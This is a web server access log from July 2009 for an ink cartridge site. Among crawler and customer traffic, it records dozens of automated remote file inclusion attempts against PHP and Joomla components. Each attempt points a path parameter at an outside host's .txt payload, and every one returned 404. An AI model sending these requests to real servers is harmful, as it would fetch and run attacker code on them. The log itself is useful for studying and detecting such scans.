88.191.37.60 - - [01/Jul/2009:14:21:02 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
213.238.52.141 - - [01/Jul/2009:14:22:24 -0700] "GET /logs/scripts.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
202.181.243.113 - - [01/Jul/2009:14:28:28 -0700] "GET /logs/scripts.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
74.53.70.114 - - [01/Jul/2009:14:29:34 -0700] "GET /logs/scripts.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.27.67 - - [01/Jul/2009:14:29:43 -0700] "GET /logs/scripts.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
202.181.243.113 - - [01/Jul/2009:14:30:13 -0700] "GET /logs/scripts.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
12.10.245.227 - - [01/Jul/2009:14:30:38 -0700] "GET /email/images/inkmail13_06.gif HTTP/1.1" 200 26778 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "site.inkjetcartridge.com"
72.30.142.250 - - [01/Jul/2009:14:41:21 -0700] "GET /tmp/?N=D HTTP/1.0" 200 786 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
72.30.142.250 - - [01/Jul/2009:14:45:01 -0700] "GET /phpbb/profile.php?mode=viewprofile&u=36 HTTP/1.0" 200 518 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:14:49:54 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:14:50:19 -0700] "GET / HTTP/1.1" 200 2132 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:14:50:46 -0700] "GET /phpbb/viewtopic.php?p=5126 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:14:51:44 -0700] "GET /phpbb/viewtopic.php?p=5132 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:14:52:43 -0700] "GET /phpbb/viewtopic.php?p=5142 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:14:53:13 -0700] "GET /phpbb/viewtopic.php?p=5539 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:14:53:36 -0700] "GET /phpbb/viewtopic.php?p=5625 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:14:54:06 -0700] "GET /phpbb/viewtopic.php?p=6706 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:14:54:27 -0700] "GET /phpbb/viewtopic.php?p=7070 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:14:54:53 -0700] "GET /phpbb/viewtopic.php?p=8673 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:14:55:23 -0700] "GET /phpbb/posting.php?f=1&mode=newtopic&sid=6628e2faa2ae8c662f5871440a25b677 HTTP/1.1" 200 454 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:14:55:44 -0700] "GET /links/links4_2.html HTTP/1.1" 200 29383 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
72.30.142.250 - - [01/Jul/2009:14:55:50 -0700] "GET /phpbb/viewtopic.php?p=5682 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:14:56:20 -0700] "GET /logs/access_081101.log HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:14:57:01 -0700] "GET /phpbb/viewtopic.php?p=57 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:14:57:52 -0700] "GET /phpbb/viewtopic.php?p=1693 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:14:58:40 -0700] "GET /phpbb/viewtopic.php?p=3011 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:15:01:25 -0700] "GET /phpbb/viewtopic.php?p=3023 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:15:02:13 -0700] "GET /phpbb/viewtopic.php?p=3029 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.74 - - [01/Jul/2009:15:02:35 -0700] "GET /phpbb/viewtopic.php?p=3035 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
66.45.137.8 - - [01/Jul/2009:15:19:30 -0700] "GET /email/images/inkmail13_02.gif HTTP/1.1" 200 16093 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "site.inkjetcartridge.com"
71.112.214.253 - - [01/Jul/2009:15:27:26 -0700] "GET /email/images/inkmail13_04.gif HTTP/1.1" 200 17176 "http://webmailb.juno.com/webmail/new/5?userinfo=6d62ad6662229d9e382033f183b313b2&count=1246463253" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8" "site.inkjetcartridge.com"
71.112.214.253 - - [01/Jul/2009:15:27:26 -0700] "GET /email/images/inkmail13_05.gif HTTP/1.1" 200 14099 "http://webmailb.juno.com/webmail/new/5?userinfo=6d62ad6662229d9e382033f183b313b2&count=1246463253" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8" "site.inkjetcartridge.com"
83.16.182.130 - - [01/Jul/2009:15:27:34 -0700] "GET /modules/tinycontent/admin/index.php?spaw_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.16.182.130 - - [01/Jul/2009:15:27:34 -0700] "GET /logs/modules/tinycontent/admin/index.php?spaw_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.16.182.130 - - [01/Jul/2009:15:27:34 -0700] "GET /logs/access.log%20%20/modules/tinycontent/admin/index.php?spaw_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.30.142.250 - - [01/Jul/2009:15:35:57 -0700] "GET /phpbb/viewtopic.php?p=3746 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
87.106.54.126 - - [01/Jul/2009:15:37:16 -0700] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.106.54.126 - - [01/Jul/2009:15:37:16 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.106.54.126 - - [01/Jul/2009:15:37:16 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
212.227.93.172 - - [01/Jul/2009:15:37:18 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
212.227.93.172 - - [01/Jul/2009:15:37:18 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
212.227.93.172 - - [01/Jul/2009:15:37:18 -0700] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.106.54.126 - - [01/Jul/2009:15:38:57 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
201.38.0.130 - - [01/Jul/2009:15:41:43 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
201.38.0.130 - - [01/Jul/2009:15:41:43 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
201.38.0.130 - - [01/Jul/2009:15:41:43 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.94.6.3 - - [01/Jul/2009:15:44:01 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.94.6.3 - - [01/Jul/2009:15:44:01 -0700] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.94.6.3 - - [01/Jul/2009:15:44:01 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.94.6.3 - - [01/Jul/2009:15:45:41 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.30.142.250 - - [01/Jul/2009:15:47:39 -0700] "GET /phpbb/viewtopic.php?p=3223 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
87.106.54.126 - - [01/Jul/2009:15:52:41 -0700] "GET /logs/scripts.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
212.227.93.172 - - [01/Jul/2009:15:53:13 -0700] "GET /logs/scripts.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.82.228.83 - - [01/Jul/2009:16:00:29 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.82.228.83 - - [01/Jul/2009:16:00:29 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.82.228.83 - - [01/Jul/2009:16:00:29 -0700] "GET /logs/access.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
24.128.155.235 - - [01/Jul/2009:16:02:54 -0700] "GET /boomerang_images/lostminerranch.gif HTTP/1.1" 200 9260 "http://www.boomerangs.com/corporategifts.html" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/2009060619 Gentoo Firefox/3.0.10" "site.inkjetcartridge.com"
24.128.155.235 - - [01/Jul/2009:16:02:54 -0700] "GET /boomerang_images/alaska.gif HTTP/1.1" 200 8147 "http://www.boomerangs.com/corporategifts.html" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/2009060619 Gentoo Firefox/3.0.10" "site.inkjetcartridge.com"
24.128.155.235 - - [01/Jul/2009:16:02:54 -0700] "GET /boomerang_images/mini2.gif HTTP/1.1" 200 7156 "http://www.boomerangs.com/corporategifts.html" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/2009060619 Gentoo Firefox/3.0.10" "site.inkjetcartridge.com"
24.128.155.235 - - [01/Jul/2009:16:02:54 -0700] "GET /boomerang_images/roi.gif HTTP/1.1" 200 8343 "http://www.boomerangs.com/corporategifts.html" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/2009060619 Gentoo Firefox/3.0.10" "site.inkjetcartridge.com"
24.128.155.235 - - [01/Jul/2009:16:02:54 -0700] "GET /boomerang_images/amd.gif HTTP/1.1" 200 10242 "http://www.boomerangs.com/corporategifts.html" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/2009060619 Gentoo Firefox/3.0.10" "site.inkjetcartridge.com"
24.128.155.235 - - [01/Jul/2009:16:02:54 -0700] "GET /boomerang_images/magma.gif HTTP/1.1" 200 8881 "http://www.boomerangs.com/corporategifts.html" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/2009060619 Gentoo Firefox/3.0.10" "site.inkjetcartridge.com"
24.128.155.235 - - [01/Jul/2009:16:02:54 -0700] "GET /boomerang_images/tri-fly.jpg HTTP/1.1" 200 7476 "http://www.boomerangs.com/corporategifts.html" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/2009060619 Gentoo Firefox/3.0.10" "site.inkjetcartridge.com"
24.128.155.235 - - [01/Jul/2009:16:02:54 -0700] "GET /boomerang_images/profly.gif HTTP/1.1" 200 10139 "http://www.boomerangs.com/corporategifts.html" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/2009060619 Gentoo Firefox/3.0.10" "site.inkjetcartridge.com"
24.128.155.235 - - [01/Jul/2009:16:02:54 -0700] "GET /boomerang_images/funfly.gif HTTP/1.1" 200 23033 "http://www.boomerangs.com/corporategifts.html" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/2009060619 Gentoo Firefox/3.0.10" "site.inkjetcartridge.com"
65.55.108.236 - - [01/Jul/2009:16:03:17 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
65.55.108.236 - - [01/Jul/2009:16:03:17 -0700] "GET /links/links19.html HTTP/1.1" 200 29321 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
218.94.6.3 - - [01/Jul/2009:16:03:50 -0700] "GET /logs/scripts.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.30.142.250 - - [01/Jul/2009:16:06:34 -0700] "GET /phpbb/posting.php?mode=reply&t=1483 HTTP/1.0" 200 518 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
89.149.244.84 - - [01/Jul/2009:16:07:36 -0700] "GET /phpbb/posting.php?mode=reply&t=176 HTTP/1.1" 200 534 "http://site.inkjetcartridge.com/phpbb/viewtopic.php?t=176&start=300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "site.inkjetcartridge.com"
201.172.77.56 - - [01/Jul/2009:16:07:38 -0700] "POST /phpbb/posting.php HTTP/1.1" 200 534 "http://site.inkjetcartridge.com/phpbb/posting.php?mode=reply&t=176" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "site.inkjetcartridge.com"
72.30.142.250 - - [01/Jul/2009:16:09:11 -0700] "GET /phpbb/viewtopic.php?p=1642 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
74.53.70.114 - - [01/Jul/2009:16:10:25 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
74.53.70.114 - - [01/Jul/2009:16:10:25 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
74.53.70.114 - - [01/Jul/2009:16:10:25 -0700] "GET /logs/access.log%20%20/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
74.53.70.114 - - [01/Jul/2009:16:10:49 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
74.53.70.114 - - [01/Jul/2009:16:10:49 -0700] "GET /logs/access.log%20%20/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.30.142.250 - - [01/Jul/2009:16:13:34 -0700] "GET /phpbb/viewtopic.php?p=2405 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
74.53.70.114 - - [01/Jul/2009:16:14:55 -0700] "GET /logs/access.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
74.53.70.114 - - [01/Jul/2009:16:17:47 -0700] "GET /logs/access.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.82.228.83 - - [01/Jul/2009:16:23:49 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kq-china.com/web/templates/ja_purity/id1.txt??????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.82.228.83 - - [01/Jul/2009:16:23:49 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kq-china.com/web/templates/ja_purity/id1.txt??????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.82.228.83 - - [01/Jul/2009:16:23:49 -0700] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kq-china.com/web/templates/ja_purity/id1.txt??????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
65.55.106.208 - - [01/Jul/2009:16:27:04 -0700] "GET /links/?D=A HTTP/1.1" 200 6611 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
72.82.228.83 - - [01/Jul/2009:16:36:23 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kq-china.com/web/templates/ja_purity/id1.txt??????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.81.48.164 - - [01/Jul/2009:16:40:55 -0700] "GET /email/images/inkmail13_04.gif HTTP/1.1" 200 17176 "http://webmaila.juno.com/webmail/new/5?userinfo=39954d94c4976ca13e537ee3d20b163a&count=1246491620" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2)" "site.inkjetcartridge.com"
124.0.139.129 - - [01/Jul/2009:16:46:33 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
124.0.139.129 - - [01/Jul/2009:16:46:34 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
124.0.139.129 - - [01/Jul/2009:16:46:37 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.30.142.250 - - [01/Jul/2009:16:48:40 -0700] "GET /tmp/?S=A HTTP/1.0" 200 786 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
124.0.139.129 - - [01/Jul/2009:16:48:43 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
124.0.139.129 - - [01/Jul/2009:16:48:43 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
124.0.139.129 - - [01/Jul/2009:16:48:43 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.30.142.250 - - [01/Jul/2009:16:49:52 -0700] "GET /phpbb/privmsg.php?mode=post&u=3 HTTP/1.0" 200 519 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
87.98.222.18 - - [01/Jul/2009:16:52:27 -0700] "GET /logs/access.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.98.222.18 - - [01/Jul/2009:16:52:27 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.98.222.18 - - [01/Jul/2009:16:52:27 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.185.53.35 - - [01/Jul/2009:16:57:42 -0700] "GET /email/images/inkmail13_03.gif HTTP/1.1" 200 15936 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.2; MSOffice 12)" "site.inkjetcartridge.com"
124.0.139.129 - - [01/Jul/2009:16:58:36 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.98.222.18 - - [01/Jul/2009:16:58:59 -0700] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
124.0.139.129 - - [01/Jul/2009:17:00:07 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
94.142.128.140 - - [01/Jul/2009:17:05:51 -0700] "GET /phpbb/index.php HTTP/1.0" 200 517 "http://site.inkjetcartridge.com/phpbb//index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; (R1 1.5))" "site.inkjetcartridge.com"
